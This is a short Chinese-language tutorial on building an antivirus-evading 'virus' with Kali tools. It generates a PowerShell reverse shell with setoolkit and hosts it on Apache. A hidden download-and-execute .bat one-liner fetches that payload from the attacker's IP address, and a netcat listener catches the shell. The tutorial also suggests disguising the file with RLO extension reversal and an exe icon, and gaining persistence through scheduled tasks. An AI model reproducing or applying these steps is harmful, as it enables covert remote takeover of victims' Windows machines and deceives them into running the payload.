使用Powershell和nc绕过防病毒

如何创建一个不会被发现的病毒?在本教程中,我将教您如何编写自己的简单病毒,该病毒将绕过防病毒从apache网络服务器下载并执行Powershell有效负载。

环境准备:

  • 1.kali linux
  • 2. 社会工程学工具包setoolkit(kali已经预装了)
  • 3. Apache Web服务器 ( kali已经预装了 )
  • 4.netcat( kali已经预装了 )

步骤1:创建powershell有效载荷

使用Social Engineering Toolkit创建我们的有效载荷,在kali控制台输入:setoolkit

输入1表示“社会工程学攻击”,然后输入9表示“powershell攻击向量”,最后输入2选择Powershell 反向shell,输入kali的ip地址,端口输入的位置默认回车,提示是否启动监听输入no。

至此,我们的有效载荷创建完毕了。

接下来,鼠标右键复制上述给出的路径

kali新建一个终端 ,cd 到该路径,将powershell.reverse.txt文件复制到网站目录/var/www/html下,最后启动apache2服务器:

service apache2 start

步骤2:创建bat文件

在windows中新建一个txt文件,复制以下代码:

powershell -nop -w hidden -c “IEX(new-object net.webclient).downloadstring(‘http://172.16.6.134/powershell.reverse.txt’)”

注意: 修改IP地址为你自己的kali的ip地址,保存内容,可命名为test.bat

步骤3:设置监听

回到kali中,在终端打开nc监听:

nc -lvp 443

在windows中双击运行bat文件后我们看到nc已经收到一个会话


我们可以输入windows命令,如dir、ipconfig、whoami 、查看用户等

最后我们来检查防病毒效果:

将test.bat上传至virustotal检测

后续处理,可以使用unicode插入RLO,颠倒后缀名,再使用batto-exe工具将文件转换为exe格式,设置图标等操作,拿到权限后使用schtask添加开机启动计划任务对目标进行持久控制。

You may also like...